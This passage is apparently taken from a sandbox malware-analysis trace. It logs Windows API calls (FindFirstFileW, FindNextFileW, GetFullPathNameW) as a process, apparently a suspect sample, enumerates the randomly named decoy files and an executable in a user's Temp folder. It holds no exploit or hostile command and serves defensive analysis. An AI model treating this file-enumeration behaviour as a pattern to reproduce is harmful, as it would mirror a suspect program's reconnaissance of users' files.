ftLastWriteTime.dwHighDateTime=0x1d7e73a, nFileSizeHigh=0x0, nFileSizeLow=0x32ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="4SPDBpU17zZhoPV.pps", cAlternateFileName="4SPDBP~1.PPS")) returned 1 [0208.295] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcfe07360, ftCreationTime.dwHighDateTime=0x1d80713, ftLastAccessTime.dwLowDateTime=0xcfe07360, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xd0100ee0, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x3795a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="52B4.exe", cAlternateFileName="")) returned 1 [0208.295] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdfed5fb0, ftCreationTime.dwHighDateTime=0x1d7da55, ftLastAccessTime.dwLowDateTime=0xcf059260, ftLastAccessTime.dwHighDateTime=0x1d7e16e, ftLastWriteTime.dwLowDateTime=0xcf059260, ftLastWriteTime.dwHighDateTime=0x1d7e16e, nFileSizeHigh=0x0, nFileSizeLow=0x18762, dwReserved0=0x0, dwReserved1=0x0, cFileName="BRysK.rtf", cAlternateFileName="")) returned 1 [0208.295] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x837d4c30, ftCreationTime.dwHighDateTime=0x1d7e4fb, ftLastAccessTime.dwLowDateTime=0x369534a0, ftLastAccessTime.dwHighDateTime=0x1d7e627, ftLastWriteTime.dwLowDateTime=0x369534a0, ftLastWriteTime.dwHighDateTime=0x1d7e627, nFileSizeHigh=0x0, nFileSizeLow=0x11cb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bz61yht_1JVVMFd.avi", cAlternateFileName="BZ61YH~1.AVI")) returned 1 [0208.295] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9dc99990, ftCreationTime.dwHighDateTime=0x1d7e041, ftLastAccessTime.dwLowDateTime=0xaf2fbf70, ftLastAccessTime.dwHighDateTime=0x1d7e04b, ftLastWriteTime.dwLowDateTime=0xaf2fbf70, ftLastWriteTime.dwHighDateTime=0x1d7e04b, nFileSizeHigh=0x0, nFileSizeLow=0x5d1f, dwReserved0=0x0, dwReserved1=0x0, cFileName="EPXgpx9 GUyCEVVkku3.ods", cAlternateFileName="EPXGPX~1.ODS")) returned 1 [0208.295] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x852aa500, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x852aa500, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FXSAPIDebugLogFile.txt", cAlternateFileName="FXSAPI~1.TXT")) returned 1 [0208.295] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc7b18e30, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xc7b18e30, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xc7b18e30, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="gen_py", cAlternateFileName="")) returned 1 [0208.295] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfc2d7ad0, ftCreationTime.dwHighDateTime=0x1d7db4e, ftLastAccessTime.dwLowDateTime=0x76a50980, ftLastAccessTime.dwHighDateTime=0x1d7e299, ftLastWriteTime.dwLowDateTime=0x76a50980, ftLastWriteTime.dwHighDateTime=0x1d7e299, nFileSizeHigh=0x0, nFileSizeLow=0x100e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="gUwL6b4bliUpoboFV4m.avi", cAlternateFileName="GUWL6B~1.AVI")) returned 1 [0208.295] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1de8a1b0, ftCreationTime.dwHighDateTime=0x1d7ddf5, ftLastAccessTime.dwLowDateTime=0xca9065e0, ftLastAccessTime.dwHighDateTime=0x1d7df69, ftLastWriteTime.dwLowDateTime=0xca9065e0, ftLastWriteTime.dwHighDateTime=0x1d7df69, nFileSizeHigh=0x0, nFileSizeLow=0x1186d, dwReserved0=0x0, dwReserved1=0x0, cFileName="h2cxtEWm6GDRbxrCDW.ots", cAlternateFileName="H2CXTE~1.OTS")) returned 1 [0208.295] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe22b4330, ftCreationTime.dwHighDateTime=0x1d7e394, ftLastAccessTime.dwLowDateTime=0x3e48ad50, ftLastAccessTime.dwHighDateTime=0x1d7e5e9, ftLastWriteTime.dwLowDateTime=0x3e48ad50, ftLastWriteTime.dwHighDateTime=0x1d7e5e9, nFileSizeHigh=0x0, nFileSizeLow=0xeebe, dwReserved0=0x0, dwReserved1=0x0, cFileName="hVRMr.pps", cAlternateFileName="")) returned 1 [0208.295] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad3d2380, ftCreationTime.dwHighDateTime=0x1d7de64, ftLastAccessTime.dwLowDateTime=0xf3658190, ftLastAccessTime.dwHighDateTime=0x1d7df81, ftLastWriteTime.dwLowDateTime=0xf3658190, ftLastWriteTime.dwHighDateTime=0x1d7df81, nFileSizeHigh=0x0, nFileSizeLow=0x4089, dwReserved0=0x0, dwReserved1=0x0, cFileName="ic2fIP37Uc.bmp", cAlternateFileName="IC2FIP~1.BMP")) returned 1 [0208.295] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa06364c0, ftCreationTime.dwHighDateTime=0x1d7de74, ftLastAccessTime.dwLowDateTime=0x1d1b3ab0, ftLastAccessTime.dwHighDateTime=0x1d7e668, ftLastWriteTime.dwLowDateTime=0x1d1b3ab0, ftLastWriteTime.dwHighDateTime=0x1d7e668, nFileSizeHigh=0x0, nFileSizeLow=0x16f06, dwReserved0=0x0, dwReserved1=0x0, cFileName="IK_T8zXKdH7.avi", cAlternateFileName="IK_T8Z~1.AVI")) returned 1 [0208.296] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x40344e0, ftCreationTime.dwHighDateTime=0x1d7dc4b, ftLastAccessTime.dwLowDateTime=0x209ef7a0, ftLastAccessTime.dwHighDateTime=0x1d7e783, ftLastWriteTime.dwLowDateTime=0x209ef7a0, ftLastWriteTime.dwHighDateTime=0x1d7e783, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="K40PS9qTtESd.m4a", cAlternateFileName="K40PS9~1.M4A")) returned 1 [0208.296] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc83b9df0, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xc83b9df0, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xc83b9df0, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0208.296] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x98d35230, ftCreationTime.dwHighDateTime=0x1d7d715, ftLastAccessTime.dwLowDateTime=0x1aca7ad0, ftLastAccessTime.dwHighDateTime=0x1d7e692, ftLastWriteTime.dwLowDateTime=0x1aca7ad0, ftLastWriteTime.dwHighDateTime=0x1d7e692, nFileSizeHigh=0x0, nFileSizeLow=0x11b70, dwReserved0=0x0, dwReserved1=0x0, cFileName="lPjYQx5rZXTSTGkq.mp3", cAlternateFileName="LPJYQX~1.MP3")) returned 1 [0208.296] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9c70, ftCreationTime.dwHighDateTime=0x1d7d977, ftLastAccessTime.dwLowDateTime=0xf531e490, ftLastAccessTime.dwHighDateTime=0x1d7e60d, ftLastWriteTime.dwLowDateTime=0xf531e490, ftLastWriteTime.dwHighDateTime=0x1d7e60d, nFileSizeHigh=0x0, nFileSizeLow=0x108c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="LTdsCoN.swf", cAlternateFileName="")) returned 1 [0208.296] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x514720e0, ftCreationTime.dwHighDateTime=0x1d7d715, ftLastAccessTime.dwLowDateTime=0xcabb3db0, ftLastAccessTime.dwHighDateTime=0x1d7e680, ftLastWriteTime.dwLowDateTime=0xcabb3db0, ftLastWriteTime.dwHighDateTime=0x1d7e680, nFileSizeHigh=0x0, nFileSizeLow=0xa18c, dwReserved0=0x0, dwReserved1=0x0, cFileName="mJqT32qGzny.odt", cAlternateFileName="MJQT32~1.ODT")) returned 1 [0208.296] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa55223a0, ftCreationTime.dwHighDateTime=0x1d7e3d2, ftLastAccessTime.dwLowDateTime=0xe181c3f0, ftLastAccessTime.dwHighDateTime=0x1d7e5dd, ftLastWriteTime.dwLowDateTime=0xe181c3f0, ftLastWriteTime.dwHighDateTime=0x1d7e5dd, nFileSizeHigh=0x0, nFileSizeLow=0x2e86, dwReserved0=0x0, dwReserved1=0x0, cFileName="oDeF1kpQ.png", cAlternateFileName="")) returned 1 [0208.296] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x88a36fb0, ftCreationTime.dwHighDateTime=0x1d7e630, ftLastAccessTime.dwLowDateTime=0x298f7070, ftLastAccessTime.dwHighDateTime=0x1d7e782, ftLastWriteTime.dwLowDateTime=0x298f7070, ftLastWriteTime.dwHighDateTime=0x1d7e782, nFileSizeHigh=0x0, nFileSizeLow=0xd368, dwReserved0=0x0, dwReserved1=0x0, cFileName="OGz30.odp", cAlternateFileName="")) returned 1 [0208.296] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x302fe690, ftCreationTime.dwHighDateTime=0x1d7dd40, ftLastAccessTime.dwLowDateTime=0x9dbe2ce0, ftLastAccessTime.dwHighDateTime=0x1d7e4ec, ftLastWriteTime.dwLowDateTime=0x9dbe2ce0, ftLastWriteTime.dwHighDateTime=0x1d7e4ec, nFileSizeHigh=0x0, nFileSizeLow=0x753, dwReserved0=0x0, dwReserved1=0x0, cFileName="piQCB9.wav", cAlternateFileName="")) returned 1 [0208.296] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9b348780, ftCreationTime.dwHighDateTime=0x1d7daf6, ftLastAccessTime.dwLowDateTime=0x52ea10, ftLastAccessTime.dwHighDateTime=0x1d7de9b, ftLastWriteTime.dwLowDateTime=0x52ea10, ftLastWriteTime.dwHighDateTime=0x1d7de9b, nFileSizeHigh=0x0, nFileSizeLow=0x8fa6, dwReserved0=0x0, dwReserved1=0x0, cFileName="rX-N26AiJtM4pl.mp4", cAlternateFileName="RX-N26~1.MP4")) returned 1 [0208.297] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3718c4c0, ftCreationTime.dwHighDateTime=0x1d7d8fb, ftLastAccessTime.dwLowDateTime=0xf2f4a900, ftLastAccessTime.dwHighDateTime=0x1d7e500, ftLastWriteTime.dwLowDateTime=0xf2f4a900, ftLastWriteTime.dwHighDateTime=0x1d7e500, nFileSizeHigh=0x0, nFileSizeLow=0x99e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="sSCoUWdR7Tt.flv", cAlternateFileName="SSCOUW~1.FLV")) returned 1 [0208.297] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x617160f0, ftCreationTime.dwHighDateTime=0x1d7e6ad, ftLastAccessTime.dwLowDateTime=0x8f251050, ftLastAccessTime.dwHighDateTime=0x1d7e6bc, ftLastWriteTime.dwLowDateTime=0x8f251050, ftLastWriteTime.dwHighDateTime=0x1d7e6bc, nFileSizeHigh=0x0, nFileSizeLow=0x10ab4, dwReserved0=0x0, dwReserved1=0x0, cFileName="t6p7D-IBqzDj-ykxbV_.flv", cAlternateFileName="T6P7D-~1.FLV")) returned 1 [0208.297] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8014d770, ftCreationTime.dwHighDateTime=0x1d7e6a9, ftLastAccessTime.dwLowDateTime=0x9c121380, ftLastAccessTime.dwHighDateTime=0x1d7e6ad, ftLastWriteTime.dwLowDateTime=0x9c121380, ftLastWriteTime.dwHighDateTime=0x1d7e6ad, nFileSizeHigh=0x0, nFileSizeLow=0x10443, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tu0bO5LyQ7QXLaK5M.mkv", cAlternateFileName="TU0BO5~1.MKV")) returned 1 [0208.297] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x31756630, ftCreationTime.dwHighDateTime=0x1d7e072, ftLastAccessTime.dwLowDateTime=0x4b9723e0, ftLastAccessTime.dwHighDateTime=0x1d7e389, ftLastWriteTime.dwLowDateTime=0x4b9723e0, ftLastWriteTime.dwHighDateTime=0x1d7e389, nFileSizeHigh=0x0, nFileSizeLow=0x18894, dwReserved0=0x0, dwReserved1=0x0, cFileName="U2ASIB99FQmP.gif", cAlternateFileName="U2ASIB~1.GIF")) returned 1 [0208.297] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdeb6a660, ftCreationTime.dwHighDateTime=0x1d7e095, ftLastAccessTime.dwLowDateTime=0x74e2a990, ftLastAccessTime.dwHighDateTime=0x1d7e73a, ftLastWriteTime.dwLowDateTime=0x74e2a990, ftLastWriteTime.dwHighDateTime=0x1d7e73a, nFileSizeHigh=0x0, nFileSizeLow=0x8f40, dwReserved0=0x0, dwReserved1=0x0, cFileName="UjDoq1incW2uP9teg.avi", cAlternateFileName="UJDOQ1~1.AVI")) returned 1 [0208.297] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x99411110, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0x99411110, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0x99411110, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WPDNSE", cAlternateFileName="")) returned 1 [0208.297] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7c1c6480, ftCreationTime.dwHighDateTime=0x1d7dddf, ftLastAccessTime.dwLowDateTime=0xfd4ce090, ftLastAccessTime.dwHighDateTime=0x1d7e5ee, ftLastWriteTime.dwLowDateTime=0xfd4ce090, ftLastWriteTime.dwHighDateTime=0x1d7e5ee, nFileSizeHigh=0x0, nFileSizeLow=0x234a, dwReserved0=0x0, dwReserved1=0x0, cFileName="yaaL.avi", cAlternateFileName="")) returned 1 [0208.298] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x523a3390, ftCreationTime.dwHighDateTime=0x1d7d7fe, ftLastAccessTime.dwLowDateTime=0x1dbf930, ftLastAccessTime.dwHighDateTime=0x1d7e47c, ftLastWriteTime.dwLowDateTime=0x1dbf930, ftLastWriteTime.dwHighDateTime=0x1d7e47c, nFileSizeHigh=0x0, nFileSizeLow=0x10a21, dwReserved0=0x0, dwReserved1=0x0, cFileName="Yfj43u.mkv", cAlternateFileName="")) returned 1 [0208.298] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2120, ftCreationTime.dwLowDateTime=0xce825e10, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xce825e10, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xce825e10, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x200, dwReserved0=0x0, dwReserved1=0x0, cFileName="~DF00EECD0D06F50839.TMP", cAlternateFileName="~DF00E~1.TMP")) returned 1 [0208.298] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2120, ftCreationTime.dwLowDateTime=0xc8e23e30, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xc8e23e30, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xc8e23e30, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="~DF3B835B1D9CD4A189.TMP", cAlternateFileName="~DF3B8~1.TMP")) returned 1 [0208.298] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce825e10, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xce825e10, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xce825e10, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="~DF4F20DE425F2E5A5B.TMP", cAlternateFileName="~DF4F2~1.TMP")) returned 1 [0208.298] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2120, ftCreationTime.dwLowDateTime=0xc861b3f0, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xc861b3f0, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xc861b3f0, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="~DF65219CAE9E33589F.TMP", cAlternateFileName="~DF652~1.TMP")) returned 1 [0208.299] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce7ffcb0, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xce7ffcb0, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xce7ffcb0, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="~DFC8941DD3C516B334.TMP", cAlternateFileName="~DFC89~1.TMP")) returned 1 [0208.299] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x2120, ftCreationTime.dwLowDateTime=0xce7ffcb0, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xce7ffcb0, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xce7ffcb0, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x200, dwReserved0=0x0, dwReserved1=0x0, cFileName="~DFECBE7153B89C22C3.TMP", cAlternateFileName="~DFECB~1.TMP")) returned 1 [0208.299] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ed6c | out: lpFindFileData=0x38ed6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0208.299] FindClose (in: hFindFile=0x55b8a68 | out: hFindFile=0x55b8a68) returned 1 [0208.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed24) returned 1 [0208.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ef84) returned 1 [0208.299] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef30) returned 1 [0208.299] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", nBufferLength=0x105, lpBuffer=0x38ea10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", lpFilePart=0x0) returned 0x25 [0208.300] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\*", lpFindFileData=0x38ece0 | out: lpFindFileData=0x38ece0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xcfe07360, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xcfe07360, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x55b8a68 [0208.300] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xcfe07360, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xcfe07360, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0208.300] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaf7fb4b0, ftCreationTime.dwHighDateTime=0x1d7e660, ftLastAccessTime.dwLowDateTime=0xf428ad0, ftLastAccessTime.dwHighDateTime=0x1d7e72e, ftLastWriteTime.dwLowDateTime=0xf428ad0, ftLastWriteTime.dwHighDateTime=0x1d7e72e, nFileSizeHigh=0x0, nFileSizeLow=0x2e30, dwReserved0=0x0, dwReserved1=0x0, cFileName="0aK-0EL44Cni3.mp4", cAlternateFileName="0AK-0E~1.MP4")) returned 1 [0208.300] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfef67c30, ftCreationTime.dwHighDateTime=0x1d7e1ac, ftLastAccessTime.dwLowDateTime=0xaa3f7270, ftLastAccessTime.dwHighDateTime=0x1d7e63c, ftLastWriteTime.dwLowDateTime=0xaa3f7270, ftLastWriteTime.dwHighDateTime=0x1d7e63c, nFileSizeHigh=0x0, nFileSizeLow=0x13e75, dwReserved0=0x0, dwReserved1=0x0, cFileName="0KOFCT.avi", cAlternateFileName="")) returned 1 [0208.300] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x906a11c0, ftCreationTime.dwHighDateTime=0x1d7e2fe, ftLastAccessTime.dwLowDateTime=0x96d7b060, ftLastAccessTime.dwHighDateTime=0x1d7e657, ftLastWriteTime.dwLowDateTime=0x96d7b060, ftLastWriteTime.dwHighDateTime=0x1d7e657, nFileSizeHigh=0x0, nFileSizeLow=0x11e0b, dwReserved0=0x0, dwReserved1=0x0, cFileName="41ec3YG6.m4a", cAlternateFileName="")) returned 1 [0208.301] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd48a6710, ftCreationTime.dwHighDateTime=0x1d7e619, ftLastAccessTime.dwLowDateTime=0xd40c3c10, ftLastAccessTime.dwHighDateTime=0x1d7e73a, ftLastWriteTime.dwLowDateTime=0xd40c3c10, ftLastWriteTime.dwHighDateTime=0x1d7e73a, nFileSizeHigh=0x0, nFileSizeLow=0x32ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="4SPDBpU17zZhoPV.pps", cAlternateFileName="4SPDBP~1.PPS")) returned 1 [0208.301] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcfe07360, ftCreationTime.dwHighDateTime=0x1d80713, ftLastAccessTime.dwLowDateTime=0xcfe07360, ftLastAccessTime.dwHighDateTime=0x1d80713, ftLastWriteTime.dwLowDateTime=0xd0100ee0, ftLastWriteTime.dwHighDateTime=0x1d80713, nFileSizeHigh=0x0, nFileSizeLow=0x3795a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="52B4.exe", cAlternateFileName="")) returned 1 [0208.301] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdfed5fb0, ftCreationTime.dwHighDateTime=0x1d7da55, ftLastAccessTime.dwLowDateTime=0xcf059260, ftLastAccessTime.dwHighDateTime=0x1d7e16e, ftLastWriteTime.dwLowDateTime=0xcf059260, ftLastWriteTime.dwHighDateTime=0x1d7e16e, nFileSizeHigh=0x0, nFileSizeLow=0x18762, dwReserved0=0x0, dwReserved1=0x0, cFileName="BRysK.rtf", cAlternateFileName="")) returned 1 [0208.301] FindNextFileW (in: hFindFile=0x55b8a68, lpFindFileData=0x38ece8 | out: lpFindFileData=0x38ece8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x837d4c30, ftCreationTime.dwHighDateTime=0x1d7e4fb, ftLastAccessTime.dwLowDateTime=0x369534a0, ftLastAccessTime.dwHighDateTime=0x1d7e627, ftLastWriteTime.dwLowDateTime=0x369534a0, ftLastWriteTime.dwHighDateTime=0x1d7e627, nFileSizeHigh=0x0, nFileSizeLow=0x11cb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bz61yht_1JVVMFd.avi", 